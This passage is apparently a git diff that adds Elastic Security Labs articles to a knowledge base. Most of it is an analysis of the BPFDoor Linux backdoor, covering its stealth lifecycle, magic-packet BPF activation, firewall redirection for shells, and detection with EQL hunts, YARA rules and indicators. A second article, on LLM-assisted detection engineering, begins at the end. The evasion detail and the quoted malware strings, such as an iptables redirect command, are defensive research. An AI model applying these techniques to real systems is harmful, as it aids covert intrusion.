interesting piece of malware in 2021. PWC attributes this back door to a specific group from China, Red Menshen, and detailed a number of interesting components in a high-level threat research post released [last week](https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf). + +PWC’s findings indicated that ​​Red Menshen had focused their efforts on targeting specific Telecommunications, Government, Logistics, and Education groups across the Middle East and Asia. This activity has been across a Monday-to-Friday working period, between 01:00 UTC and 10:00 UTC, indicating that the operators of the malware were consistent in their attacks, and operation during a working week. + +Perhaps most concerningly, the payload itself has been observed across the last 5 years in various phases of development and complexity, indicating that the threat actor responsible for operating the malware has been at it for some time, undetected in many environments. + +> **BPFDoor Tools** +> +> The Elastic Security Team has created a few tools that will aid researchers in analyzing the BPFDoor malware. +> +> The BPFDoor scanner will allow you to scan for hosts infected with the BPFDoor malware and the BPFDoor configuration extractor will allow you to extrapolate the malware’s configuration or hardcoded values which can lead to additional observations you can use for further analysis, developing additional signatures or connecting to the backdoor utilizing our client. +> +> - [BPFDoor scanner](https://www.elastic.co/security-labs/bpfdoor-scanner) +> - [BPFDoor configuration extractor](https://www.elastic.co/security-labs/bpfdoor-configuration-extractor) + +## Attack Lifecycle + +This inherently passive backdoor payload is built to be a form of persistence – a method to regain access if the first or second stage payloads are lost. 
It is built for and intended to be installed on high-uptime servers or appliances, IoT/SCADA, or cloud systems with access to the Internet. The backdoor usually sits in temporary storage so if a server were to be rebooted or shut down, the backdoor would be lost. + +It should be assumed that if this malware is found on a system the initial-access (1st stage) or post-exploitation (2nd stage) payloads are still most likely present and possibly active elsewhere in the environment. This backdoor excels at stealth, taking every opportunity to blend in and remain undetected. + +In the below steps, we will break BPFDoor’s actions down according to the vast majority of the samples available. + +1. When executed the binary copies itself into /dev/shm/. A temporary filesystem /dev/shm stands for shared memory and is a temporary file storage facility serving as an efficient means of inter-process communication +2. Renames its process to kdmtmpflush, a hardcoded process name +3. Initializes itself with the -init flag and forks itself. Forking in Linux means creating a new process by duplicating the calling process +4. Deletes itself by removing the original binary invoked. The forked process continues to run +5. Alters the forked processes’ creation and modification time values, also known as [timestomping](https://attack.mitre.org/techniques/T1070/006/) +6. Creates a new process environment for itself and removes the old one setting (spoofing) a new process name. It changes the way it appears on the system akin to wearing a mask. The process is still kdmtmpflush but if you were to run a ps you would see whatever value it set +7. Creates a process ID (PID) file in /var/run. PID files are text files containing the process of the associated program meant for preventing multiple starts, marking residency, and used by the program to stop itself. This file resides in /var/run, another temporary file storage facility +8. Creates a raw network socket. On Linux, a socket is an endpoint for network communication that allows you to specify in detail every section of a packet allowing a user to implement their own transport layer protocol above the internet (IP) level +9. Sets BPF filters on the raw socket. [BPF](https://www.kernel.org/doc/html/v5.12/networking/filter.html) allows a user-space program to attach a filter onto any socket and allow or disallow certain types of data to come through the socket +10. Observes incoming packets +11. If a packet is observed that matches the BPF filters and contains the required data it is passed to the backdoor for processing +12. It forks the current process again +13. Changes the forked processes working directory to / +14. Changes (spoofs) the name of the forked process to a hardcoded value +15. Based on the password or existence of a password sent in the “magic packet” the backdoor provides a reverse shell, establishes a bind shell, or sends back a ping + +> **Atypical BPFDoor sample** +> +> Of note there is one [sample](https://www.virustotal.com/gui/file/07ecb1f2d9ffbd20a46cd36cd06b022db3cc8e45b1ecab62cd11f9ca7a26ab6d/detection) we have come across that does not seem to exhibit steps 1 - 4. It doesn’t alter its initial name to a hardcoded value and simply executes from its placed location, otherwise, it models the same behavior. + +Below you can see visual representations of the BPFDoor process tree, utilizing Elastic’s Analyzer View. 
The first image displays the tree prior to active use of the backdoor (i.e., reverse shell, bind shell, or pingback) and the second image after a reverse shell has connected and performed post-exploitation activities. + +![Elastic Analyzer View of the BPFDoor initial invocation process tree](/assets/images/a-peek-behind-the-bpfdoor/analyzer-view.png) + +![Elastic Analyzer View of BPFDoor following a reverse shell connection and post exploitation actions](/assets/images/a-peek-behind-the-bpfdoor/bpfdoor_analyzer.png) + +## Defense Evasion Insights + +BPFDoor is interesting given the anti-forensics and obfuscation tactics used. Astute readers will observe slight differences in the PID tree visible when running a ps ajxf on an infected host when compared to executed data within the Analyzer View inside of Elastic. This is due to the process name spoofing mentioned in step 6 of the attack lifecycle above. The image below is taken from a system running BPFDoor with an active reverse shell connection established: + +![An observed running process created by the BPFDoor reverse shell](/assets/images/a-peek-behind-the-bpfdoor/observed-process.jpg) + +The difference lies in the fact that kdmtmpflush and sh are run prior to spoofing, and are captured at runtime by Elastic Endpoint. This is an accurate representation of the processes active on the host, further confirming the importance of appropriate observation software for Linux hosts - you can't always trust what you see on the local system: + +![Elastic Analyzer View of BPFDoor demonstrating real process capture.](/assets/images/a-peek-behind-the-bpfdoor/analyzer-terminated.jpg) + +BPFDoor also holds in its repertoire the ability to subvert the traditional Linux socket client-server architecture in order to hide its malicious traffic. The methods which it utilizes to achieve this are both unusual and intriguing. + +The sockets interface is almost synonymous with TCP/IP communication. This simple interface has endured for over 40 years - predating both Linux and Windows implementations. + +![Example of how TCP/IP and socket interfaces function](/assets/images/a-peek-behind-the-bpfdoor/tcp-ip.png) + +BPFDoor uses a raw socket (as opposed to 'cooked' ones that handle IP/TCP/UDP headers transparently) to observe every packet arriving at the machine, Ethernet frame headers and all. While this might sound like a stealthy way to intercept traffic, it's actually not – on any machine with a significant amount of network traffic the CPU usage will be consistently high. + +That's where BPF comes in - an extremely efficient, kernel-level packet filter is the perfect tool to allow the implant to ignore 99% of network traffic and only become activated when a special pattern is encountered. This implant looks for a so-called magic packet in every TCP, UDP, and ICMP packet received on the system. + +Once activated, a typical reverse shell - which this backdoor also supports - creates an outbound connection to a listener set up by the attacker. This has the advantage of bypassing firewalls watching inbound traffic only. This method is well-understood by defenders, however. The sneakiest way to get a shell connected would be to reuse an existing packet flow, redirected to a separate process. + +In this attack, the initial TCP handshake is done between the attacker and a completely legitimate process – for example nginx or sshd. These handshake packets happen to be also delivered to the backdoor (like every packet on the system) but are filtered out by BPF.
Once the connection is established, however, BPFDoor sends a magic packet to the legitimate service. The implant receives it and makes a note of the originating IP and port the attacker is using, and it opens a new listening socket on an inconspicuous port (42391 - 43391). + +The implant then reconfigures the firewall to temporarily redirect all traffic from the attacker's IP/port combination to the new listening socket. The attacker initiates a second TCP handshake on the same legitimate port as before, only now iptables forwards those packets to the listening socket owned by the implant. This establishes the communication channel between attacker and implant that will be used for command and control. The implant then covers its tracks by removing the iptables firewall rules that redirected the traffic. + +Despite the firewall rule being removed, traffic on the legitimate port will continue to be forwarded to the implant due to how Linux statefully tracks connections. No visible traffic will be addressed to the implant port (although it will be delivered there). + +![A diagram representing the aforementioned network flows](/assets/images/a-peek-behind-the-bpfdoor/network-flows.png) + +## BPF Filters + +As stated in step 9 (above), [BPF](https://www.kernel.org/doc/html/v5.12/networking/filter.html), or Berkeley Packet Filters, is a technology from the early '90s that allows a user-space program to attach a network filter onto any socket and allow or disallow certain types of data to come through the socket. These filters are made up of bytecode that runs on an abstract virtual machine in the Linux kernel. The BPF virtual machine has functionality to inspect all parts of incoming packets and make an allow/drop decision based on what it sees. You can see in the image example below what this looks like within the BPFDoor source code: + +![BPFDoor source code BPF Filters](/assets/images/a-peek-behind-the-bpfdoor/bpfdoor-source-code.jpg) + +We took this BPF code, converted it, and wrote it up as pseudocode in an effort to aid our research and craft packets able to successfully get through these filters in order to activate the backdoor. + +![BPFDoor source code BPF Filter Pseudocode](/assets/images/a-peek-behind-the-bpfdoor/bpf-pseudocode.jpg) + +The above capabilities allow BPFDoor to attach a filter onto any socket and allow or disallow certain types of data to come through the socket - used carefully by the adversary to invoke a series of different functions within the payload. + +## Historical Analysis + +We wanted to see over time, between BPFDoor payloads, what, if anything, the threat actors modified. A number of samples were detonated and analyzed ranging from the uploaded source code to a [sample](https://www.virustotal.com/gui/file/599ae527f10ddb4625687748b7d3734ee51673b664f2e5d0346e64f85e185683/detection) uploaded last month. We found that the behavior over time did not change a great deal. It maintained the same relative attack lifecycle with a few variations in the hardcoded values such as passwords, process names, and files - this is not uncommon when compared to other malware samples that look to evade detection or leverage payloads across a variety of victims. + +We posit that the threat group would change passwords and update process or file names in an effort to improve operational security and remain hidden. It also makes sense that the general functionality of the backdoor would not change in any great way. As the saying goes, "If it's not broken, don't fix it".
Our malware analysis and reverse engineering team compared the source code (uploaded to [VirusTotal](https://www.virustotal.com/gui/file/8b9db0bc9152628bdacc32dab01590211bee9f27d58e0f66f6a1e26aea7552a6/detection) and found on [Pastebin](https://pastebin.com/raw/kmmJuuQP)) to a recently uploaded sample, highlighting some of the notable changes within the main function of the malware in the images below. + +![A side by side comparison of the main functions for the Pastebin source code and a sample uploaded to VT last month focusing on the hardcoded string values for the passwords, process names and file name](/assets/images/a-peek-behind-the-bpfdoor/pastebin.jpg) + +As we mentioned earlier, we have come across one recent [sample](https://www.virustotal.com/gui/file/07ecb1f2d9ffbd20a46cd36cd06b022db3cc8e45b1ecab62cd11f9ca7a26ab6d/detection) that does not seem to exhibit some of the tactics of prior payloads - it doesn't alter its initial name to a hardcoded value and simply executes from its placed location; otherwise, it models relatively the same behavior. + +## Linux Malware Sophistication + +A trend we have had the privilege of observing at Elastic is the threat landscape of Linux-targeted attacks - these are often focused on cloud workloads, or on systems that typically have less observational technology configured in many of the environments we see. The trend of complex, well-designed payloads is something that is often simply overlooked and, specifically in the case of BPFDoor, remained hidden for years. + +It is important to consider these workloads a critical component of your security posture: a lack of visibility within cloud workloads will eventually lead to large gaps in security controls - adversarial groups are growing to understand these trends and act accordingly. Best practices state that endpoint defenses should be consistent across the fleet of systems under management, and conform to a least privilege architecture. + +## Detection of BPFDoor + +After researching this malware, it became apparent why the backdoor remained in use and hidden for so long. If you aren't intimately familiar with Linux process abnormalities or weren't looking for it, you would generally not detect it. Even though it takes advantage of Linux capabilities in a stealthy manner to evade detection, there are still opportunities for both behavioral and signature-based detections. + +The first area of opportunity we witnessed while testing was the behavior we observed during the initial execution of the malware, specifically its working directory in the shared memory location /dev/shm. This is a native temporary filesystem location in Linux that uses RAM for storage, and a binary executing from it, let alone generating network connections, is fairly uncommon in practice. + +During execution, BPFDoor removes existing files from /dev/shm and copies itself there prior to initialization. A detection for this would be any execution of a binary from this directory as root (you have to be root to write to and read from this directory). + +This was verified by detonating the binary in a VM while our Elastic Agent was installed and observing the sequence of events. You can see an image of this detection on the Kibana Security Alerts page below.
This rule is publicly available as an Elastic SIEM detection rule - [Binary Executed from Shared Memory Directory](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_process_started_in_shared_memory_directory.toml): + +![Elastic Alert in Kibana - Binary Executed from Shared Memory Directory](/assets/images/a-peek-behind-the-bpfdoor/Elastic_Alert_in_Kibana_-_Binary_Executed_from_Shared_Memory_Directory.png) + +The second opportunity we noticed for detection was a specific PID file being created in /var/run. We noticed the dropped PID file was completely empty while running a quick query via the [Osquery integration](https://docs.elastic.co/en/integrations/osquery_manager) against the /var/run directory. While this is not inherently malicious, it is unusual for the file size of a PID file to be 0 or above 10 bytes, and thus we created an additional rule centered around detecting this unusual behavior. + +Our [Abnormal Process ID or Lock File Created](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_abnormal_process_id_file_created.toml) rule identifies the creation of a PID file in the main directory of /var/run with no subdirectory, ignoring common, expected PID files: + +![Elastic Alert in Kibana - Abnormal Process ID or Lock File Created](/assets/images/a-peek-behind-the-bpfdoor/abnormal-process.png) + +The third area we wanted to look at was the network connections tied to two of the three capabilities (reverse shell and bind shell) the backdoor possesses. We wanted to see if there were any suspicious network connections tied to process or user abnormalities we could sequence together based on the way BPFDoor handles establishing a reverse or bind shell. + +The reverse shell was the first capability we focused on. Taking a deep look at the process tree in and around the reverse shell establishment allowed us to key in on what would be considered a strange or even abnormal sequence of events leading to and involving an outbound network connection. + +We developed a hunt rule sequence that identifies an outbound network connection attempt followed by a session ID change as the root user by the same process entity. We kept these network-focused rules as hunt queries because of the possible performance impact of running them continually. + +The bind shell was the last capability we homed in on. Identifying an abnormal sequence of events surrounding the bind shell connection was difficult due to the way it forks, then accepts the connection, and kills the accepting process once the connection is established. Therefore, we had to focus on the sequence of events within the process entity ID directly involving the network connection and the subsequent killing of the accepting process. + +After developing the two detection rules and the two hunt rules listed below, in addition to the six YARA signatures deployed, we were able to detect BPFDoor in a myriad of different ways and within different stages of its life cycle. As stated earlier, though, if you detect this malware in your environment, it should be the least of your concerns, given the threat actor will most likely have already successfully compromised your network via other means.
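+As a quick complement to the abnormal PID file observation above, below is a minimal osquery sketch of that hunt - an illustrative query of our own rather than one of the published detection rules, assuming the standard osquery `file` table and a `.pid` naming convention - that surfaces empty or oversized PID files sitting directly under /var/run:
+
+```
+-- Illustrative hunt: empty or unusually large PID files directly under /var/run
+SELECT path, size
+FROM file
+WHERE directory = '/var/run'   -- the file table requires a path or directory constraint
+  AND filename LIKE '%.pid'
+  AND (size = 0 OR size > 10); -- mirrors the 0-byte / >10-byte observation above
+```
+
+On distributions where /var/run is a symlink to /run, the directory constraint may need adjusting, and any hits should be treated as candidates for review rather than confirmation of compromise.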
+ +![Elastic Detection Summary of complete BPFDoor attack lifecycle](/assets/images/a-peek-behind-the-bpfdoor/complete-bpfdoor.png) + +### Existing Detection Rules + +The following Elastic Detection Rules will identify BPFDoor activity: + +- [Abnormal Process ID or Lock File Created](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_abnormal_process_id_file_created.toml) +- [Binary Executed from Shared Memory Directory](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_process_started_in_shared_memory_directory.toml) + +### Hunting Queries + +This EQL rule can be used to successfully identify BPFDoor reverse shell connections having been established within your environment: + +**EQL BPFDoor reverse shell hunt query** + +``` +sequence by process.entity_id with maxspan=1m +[network where event.type == "start" and event.action == "connection_attempted" and user.id == "0" and not process.executable : ("/bin/ssh", "/sbin/ssh", "/usr/lib/systemd/systemd")] +[process where event.action == "session_id_change" and user.id == "0"] +``` + +![Elastic Alert in Kibana - Suspicious Network Connection Attempt by Root](/assets/images/a-peek-behind-the-bpfdoor/attempt-by-root.png) + +The hunt rule we created here identifies a sequence of events beginning with a session id change, followed by a network connection accepted, in correlation with ptmx file creation and a deletion of the process responsible for accepting the network connection. This EQL rule can be used to successfully identify BPFDoor bind shell connections within your environment: + +**EQL BPFDoor bind shell hunt query** + +``` +sequence by process.entity_id with maxspan=1m +[process where event.type == "change" and event.action == "session_id_change" and user.id == 0 and not process.executable : ("/bin/ssh", "/sbin/ssh", "/usr/lib/systemd/systemd")] +[network where event.type == "start" and event.action == "connection_accepted" and user.id == 0] +[file where event.action == "creation" and user.id == 0 and file.path == "/dev/ptmx"] +[process where event.action == "end" and user.id == 0 and not process.executable : ("/bin/ssh", "/sbin/ssh", "/usr/lib/systemd/systemd")] +``` + +![Elastic Alert in Kibana - Suspicious Network Connection Accept by Root](/assets/images/a-peek-behind-the-bpfdoor/Elastic_Alert_in_Kibana_-_Suspicious_Network_Connection_Accept_by_Root.png) + +### YARA Rules + +In addition to behavioral detection rules in the Elastic Endpoint, we are releasing a set of BPFDoor Yara signatures for the community. + +**BPFDoor YARA rule** + +``` +rule Linux_Trojan_BPFDoor_1 { + + meta: + Author = "Elastic Security" + creation_date = "2022-05-10" + last_modified = "2022-05-10" + os = "Linux" + arch = "x86" + category_type = "Trojan" + family = "BPFDoor" + threat_name = "Linux.Trojan.BPFDoor" + description = "Detects BPFDoor malware." 
+ reference_sample = "144526d30ae747982079d5d340d1ff116a7963aba2e3ed589e7ebc297ba0c1b3" + strings: + $a1 = "hald-addon-acpi: listening on acpi kernel interface /proc/acpi/event" ascii fullword + $a2 = "/sbin/iptables -t nat -D PREROUTING -p tcp -s %s --dport %d -j REDIRECT --to-ports %d" ascii fullword + $a3 = "avahi-daemon: chroot helper" ascii fullword + $a4 = "/sbin/mingetty /dev/tty6" ascii fullword + $a5 = "ttcompat" ascii fullword + condition: + all of them +} + +rule Linux_Trojan_BPFDoor_2 { + meta: + Author = "Elastic Security" + creation_date = "2022-05-10" + last_modified = "2022-05-10" + os = "Linux" + arch = "x86" + category_type = "Trojan" + family = "BPFDoor" + threat_name = "Linux.Trojan.BPFDoor" + description = "Detects BPFDoor malware." + reference_sample = "3a1b174f0c19c28f71e1babde01982c56d38d3672ea14d47c35ae3062e49b155" + strings: + $a1 = "hald-addon-acpi: listening on acpi kernel interface /proc/acpi/event" ascii fullword + $a2 = "/sbin/mingetty /dev/tty7" ascii fullword + $a3 = "pickup -l -t fifo -u" ascii fullword + $a4 = "kdmtmpflush" ascii fullword + $a5 = "avahi-daemon: chroot helper" ascii fullword + $a6 = "/sbin/auditd -n" ascii fullword + condition: + all of them +} + +rule Linux_Trojan_BPFDoor_3 { + meta: + Author = "Elastic Security" + creation_date = "2022-05-10" + last_modified = "2022-05-10" + os = "Linux" + arch = "x86" + category_type = "Trojan" + family = "BPFDoor" + threat_name = "Linux.Trojan.BPFDoor" + description = "Detects BPFDoor malware." + reference_sample = "591198c234416c6ccbcea6967963ca2ca0f17050be7eed1602198308d9127c78" + strings: + $a1 = "[-] Spawn shell failed." ascii fullword + $a2 = "[+] Packet Successfuly Sending %d Size." ascii fullword + $a3 = "[+] Monitor packet send." ascii fullword + $a4 = "[+] Using port %d" + $a5 = "decrypt_ctx" ascii fullword + $a6 = "getshell" ascii fullword + $a7 = "getpassw" ascii fullword + $a8 = "export %s=%s" ascii fullword + condition: + all of them +} + +rule Linux_Trojan_BPFDoor_4 { + meta: + Author = "Elastic Security" + creation_date = "2022-05-10" + last_modified = "2022-05-10" + os = "Linux" + arch = "x86" + category_type = "Trojan" + family = "BPFDoor" + threat_name = "Linux.Trojan.BPFDoor" + description = "Detects BPFDoor malware." + reference_sample = "591198c234416c6ccbcea6967963ca2ca0f17050be7eed1602198308d9127c78" + strings: + $a1 = { 45 D8 0F B6 10 0F B6 45 FF 48 03 45 F0 0F B6 00 8D 04 02 00 } + condition: + all of them +} + +rule Linux_Trojan_BPFDoor_5 { + meta: + Author = "Elastic Security" + creation_date = "2022-05-10" + last_modified = "2022-05-10" + os = "Linux" + arch = "x86" + category_type = "Trojan" + family = "BPFDoor" + threat_name = "Linux.Trojan.BPFDoor" + description = "Detects BPFDoor malware." + reference_sample = "76bf736b25d5c9aaf6a84edd4e615796fffc338a893b49c120c0b4941ce37925" + strings: + $a1 = "getshell" ascii fullword + $a2 = "/sbin/agetty --noclear tty1 linux" ascii fullword + $a3 = "packet_loop" ascii fullword + $a4 = "godpid" ascii fullword + $a5 = "ttcompat" ascii fullword + $a6 = "decrypt_ctx" ascii fullword + $a7 = "rc4_init" ascii fullword + $b1 = { D0 48 89 45 F8 48 8B 45 F8 0F B6 40 0C C0 E8 04 0F B6 C0 C1 } + condition: + all of ($a*) or 1 of ($b*) +} + +rule Linux_Trojan_BPFDoor_6 { + meta: + Author = "Elastic Security" + creation_date = "2022-05-10" + last_modified = "2022-05-10" + os = "Linux" + arch = "x86" + category_type = "Trojan" + family = "BPFDoor" + threat_name = "Linux.Trojan.BPFDoor" + description = "Detects BPFDoor malware." 
+ reference_sample = "dc8346bf443b7b453f062740d8ae8d8d7ce879672810f4296158f90359dcae3a" + strings: + $a1 = "getpassw" ascii fullword + $a2 = "(udp[8:2]=0x7255) or (icmp[8:2]=0x7255) or (tcp[((tcp[12]&0xf0)>>2):2]=0x5293)" ascii fullword + $a3 = "/var/run/haldrund.pid" ascii fullword + $a4 = "Couldn't install filter %s: %s" ascii fullword + $a5 = "godpid" ascii fullword + condition: + all of them +} +``` + +## Interacting with BPFDoor + +The Elastic Security Team has released several tools that can aid in further research regarding BPFDoor to include a network scanner used to identify infected hosts, a BPFDoor malware configuration extractor, and a BPFDoor client binary that can be used to actively interact with a sample. + +### BPFDoor Scanner + +The Elastic Security Team [has released](https://www.elastic.co/security-labs/bpfdoor-scanner) a Python script that can identify if you have BPFDoor infected hosts. + +The scanner sends a packet to a defined IP address using the default target port (68/UDP)and default interface. It listens to return traffic on port 53/UDP. + +![BPFDoor scanner tool](/assets/images/a-peek-behind-the-bpfdoor/BPFDoor_scanner_tool.jpg) + +### BPFDoor Configuration Extractor + +This tool will allow you to extract configurations from any BPFDoor malware you may have collected. This will allow you to develop additional signatures and further analysis of the malware as well as your environment. + +The BPFDoor configuration extractor can be downloaded [here](https://www.elastic.co/security-labs/bpfdoor-configuration-extractor). + +![BPFDoor configuration extractor](/assets/images/a-peek-behind-the-bpfdoor/BPFDoor_configuration_extractor.jpg) + +### BPFDoor Client POC + +Quickly after beginning our research into this malware we realized we would also need to actively interact with BPFDoor in order to observe the full extent of the capabilities that it possesses and monitor what these capabilities would look like from a host and SIEM level. + +In order to do this, we had to break down the BPF filters in the BPFDoor source code so we could craft packets for the different protocols. To do this, we used [Scapy](https://scapy.net/), a packet manipulation program, to ensure we could pass the filters for the purpose of activating the backdoor. Once we ensured we could pass the filters, Rhys Rustad-Elliott, an engineer at Elastic built a BPFDoor client that accepts a password, IP address, and port allowing you to connect to a BPFDoor sample and interact if you possess the sample’s hardcoded passwords. + +Depending on the password or lack of password provided, BPFDoor will behave exactly the same way it would in the wild. You can invoke a reverse shell, establish a bind shell, or connect to it with no supplied password to receive a ping-back confirming its installation. + +![A preview of the BPFDoor Client developed by Elastic Security to assist in research](/assets/images/a-peek-behind-the-bpfdoor/A_preview_of_the_BPFDoor_Client_developed_by_Elastic_Security_to_assist_in_research.jpg) + +Researchers looking to use BPFDoor can [reach out to Elastic Security](mailto:threat-notification@elastic.co) for access to the BPFDoor client POC. Please note that these tools will be shared at our discretion with those in the trusted security community looking to improve the detection of this vulnerability. + +## Impact + +The following MITRE ATT&CK Tactic, Techniques, and Sub-techniques have been observed with the BPFDoor malware. 
+
+### Tactics
+
+Tactics represent the “why” of an ATT&CK technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+
+- [Execution](https://attack.mitre.org/tactics/TA0002/)
+
+### Techniques (sub-techniques)
+
+Techniques (and sub-techniques) represent “how” an adversary achieves a tactical goal by performing an action.
+
+- [Native API](https://attack.mitre.org/techniques/T1106/)
+- [External Remote Services](https://attack.mitre.org/techniques/T1133/)
+- [Hide Artifacts](https://attack.mitre.org/techniques/T1564/)
+- [Indicator Removal on Host](https://attack.mitre.org/techniques/T1070/)
+- [Non-Application Layer Protocol](https://attack.mitre.org/techniques/T1095/)
+- [Command and Scripting Interpreter: Unix Shell](https://attack.mitre.org/techniques/T1059/004)
+- [Abuse Elevation Control Mechanism: Setuid and Setgid](https://attack.mitre.org/techniques/T1548/001/)
+
+## Source Pseudocode
+
+To clearly articulate the details of this malware, we’ve created [two diagrams](https://www.elastic.co/pdf/bpfdoor_pseudocode.pdf) that outline the specific pseudocode for BPFDoor, based on the source code uploaded to VirusTotal and found on Pastebin. While these diagrams contain a lot of detail, they are straightforward to follow for researchers who want to build on this work.
+
+## Summary
+
+While threat groups continue to increase in maturity, we expect this kind of mature, well-designed, and well-hidden threat to continue to be found within Linux environments. These kinds of findings reiterate the importance of comprehensive security controls across the entirety of a fleet, rather than simply focusing on user endpoints.
+
+BPFDoor is a perfect example of how important it is to monitor workloads within Linux environments. Payloads such as this are nearly impossible to observe and detect without sufficient controls, and they should be considered a growing trend within the general adversarial landscape. 
+ +## Observables + +| Observable | Type | Reference | Note | +| ---------------------------------------------------------------- | ------------ | -------------------- | -------------------------------- | +| /dev/shm/kdmtmpflush | process name | BPFDoor process name | Observed process name of BPFDoor | +| /var/run/haldrund.pid | file name | BPFDoor file name | Observed BPFDoor PID file | +| /var/run/kdevrund.pid | file name | BPFDoor file name | Observed BPFDoor PID file | +| /var/run/xinetd.lock | file name | BPFDoor file name | Observed BPFDoor lock file | +| 74ef6cc38f5a1a80148752b63c117e6846984debd2af806c65887195a8eccc56 | SHA-256 | BPFDoor malware | | +| 07ecb1f2d9ffbd20a46cd36cd06b022db3cc8e45b1ecab62cd11f9ca7a26ab6d | SHA-256 | BPFDoor malware | | +| 76bf736b25d5c9aaf6a84edd4e615796fffc338a893b49c120c0b4941ce37925 | SHA-256 | BPFDoor malware | | +| 93f4262fce8c6b4f8e239c35a0679fbbbb722141b95a5f2af53a2bcafe4edd1c | SHA-256 | BPFDoor malware | | +| 96e906128095dead57fdc9ce8688bb889166b67c9a1b8fdb93d7cff7f3836bb9 | SHA-256 | BPFDoor malware | | +| 599ae527f10ddb4625687748b7d3734ee51673b664f2e5d0346e64f85e185683 | SHA-256 | BPFDoor malware | | +| 2e0aa3da45a0360d051359e1a038beff8551b957698f21756cfc6ed5539e4bdb | SHA-256 | BPFDoor malware | | +| f47de978da1dbfc5e0f195745e3368d3ceef034e964817c66ba01396a1953d72 | SHA-256 | BPFDoor malware | | +| fd1b20ee5bd429046d3c04e9c675c41e9095bea70e0329bd32d7edd17ebaf68a | SHA-256 | BPFDoor malware | | +| 5faab159397964e630c4156f8852bcc6ee46df1cdd8be2a8d3f3d8e5980f3bb3 | SHA-256 | BPFDoor malware | | +| f8a5e735d6e79eb587954a371515a82a15883cf2eda9d7ddb8938b86e714ea27 | SHA-256 | BPFDoor malware | | +| 5b2a079690efb5f4e0944353dd883303ffd6bab4aad1f0c88b49a76ddcb28ee9 | SHA-256 | BPFDoor malware | | +| 97a546c7d08ad34dfab74c9c8a96986c54768c592a8dae521ddcf612a84fb8cc | SHA-256 | BPFDoor malware | | +| c80bd1c4a796b4d3944a097e96f384c85687daeedcdcf05cc885c8c9b279b09c | SHA-256 | BPFDoor malware | | +| 4c5cf8f977fc7c368a8e095700a44be36c8332462c0b1e41bff03238b2bf2a2d | SHA-256 | BPFDoor malware | | + +## References + +- https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896 +- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf +- https://www.pangulab.cn/en/post/the_bvp47_a_top-tier_backdoor_of_us_nsa_equation_group + +## Artifacts + +Artifacts are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt294e7cd5c4b8a050/628e88d93b9b8554904a703c/bpfdoor-indicators.zip) in both ECS and STIX format in a combined zip bundle. diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/accelerating_elastic_detection_tradecraft_with_llms.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/accelerating_elastic_detection_tradecraft_with_llms.md new file mode 100644 index 0000000000000..3ea1fb2b95eaa --- /dev/null +++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/accelerating_elastic_detection_tradecraft_with_llms.md @@ -0,0 +1,83 @@ +--- +title: "Accelerating Elastic detection tradecraft with LLMs" +slug: "accelerating-elastic-detection-tradecraft-with-llms" +date: "2023-09-29" +description: "Learn more about how Elastic Security Labs has been focused on accelerating our detection engineering workflows by tapping into more generative AI capabilities." 
+author:
+ - slug: mika-ayenson
+ - slug: jess-daubner
+image: "photo-edited-09@2x.jpg"
+category:
+ - slug: detection-science
+ - slug: machine-learning
+ - slug: generative-ai
+---
+
+In line with our [Openness Initiative](https://www.elastic.co/blog/continued-leadership-in-open-and-transparent-security), we remain committed to transparency and want to share how our internal AI R&D efforts have increased the productivity of our threat detection team. For the past few months, Elastic Security Labs has been focused on accelerating our detection engineering workflows by tapping into more generative AI capabilities.
+
+## The ONWeek Exploration Odyssey
+
+At Elastic, outside of our long-running [Space, Time](https://www.elastic.co/about/our-source-code) tradition, we dedicate a week every 6 months to work either independently or in a team on something we call ONWeek. This is a week where we all step away from feature work, tech debt, and other similar tasks, and instead focus on innovative ideas, active learning opportunities, applied research, and proof-of-concept work. During the previous ONWeek in May, we explored ideas for leveraging large language models (LLMs) with Elastic’s existing features to enhance security alert triage and productivity for tier 1 analysts and beyond, to improve internal productivity workflows, and to understand the foundational building blocks for our experimentation and tuning. Figure 1 shows several of the research opportunities we have identified, which involve ingesting events, passing data through tailored prompts, and generating different classes of content designed for different Elastic workflows.
+
+![Figure 1: GenAI Security Use Cases](/assets/images/accelerating-elastic-detection-tradecraft-with-llms/image1.jpg)
+Figure 1: GenAI Security Use Cases
+
+Fundamentally, we explored several traditional ML approaches, but ultimately decided to start simple and gradually increase complexity, keeping in mind these tools and concepts:
+ - **Start Simple** - A mantra that guided our approach.
+ - **Azure OpenAI** - Access to the GPT-4 LLM.
+ - **Prompt Engineering** - Developing tailored instructions for the LLM.
+ - **LangChain** - A Python library to help craft LLM applications.
+
+One of our goals is to streamline Elastic’s detection engineering workflows, allowing for greater focus on better detections while showcasing the depth and nuances of our query languages. On the way there, we’re spending time experimenting to validate our prompts and prepare them for operational use. We want to make sure that as we iterate over our prompts, we don’t incidentally introduce regressions. As AI advancements emerge, we intend for our test and evaluation (T&E) process to ensure that any adjustments, be they fine-tuning, model replacements, or prompt modifications, are deliberate. Ultimately, we aspire for our analysts to seamlessly utilize the latest AI/ML features, applying the most suitable prompts or ML techniques in the right context.
+
+With these goals in mind, our first research use case in May focused on query generation. We learned quickly that with minimal data and prompt engineering, we could chain a series of prompts to transform raw Elastic events into EQL queries. 
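+The snippet below is a minimal sketch of this kind of prompt chaining using LangChain with Azure OpenAI. It is illustrative only: the deployment name, prompts, and input file are placeholder assumptions, not the actual prompt set used in our POC.
+
+```
+# Minimal prompt-chaining sketch (illustrative; prompts and names are placeholders).
+from langchain.chains import LLMChain, SimpleSequentialChain
+from langchain.chat_models import AzureChatOpenAI
+from langchain.prompts import ChatPromptTemplate
+
+# Assumes Azure OpenAI credentials are configured via environment variables.
+llm = AzureChatOpenAI(deployment_name="gpt-4", temperature=0)
+
+# Step 1: summarize suspicious behavior from a chunk of raw events.
+summarize = LLMChain(
+    llm=llm,
+    prompt=ChatPromptTemplate.from_template(
+        "You are a detection engineer. Summarize the suspicious behavior in these "
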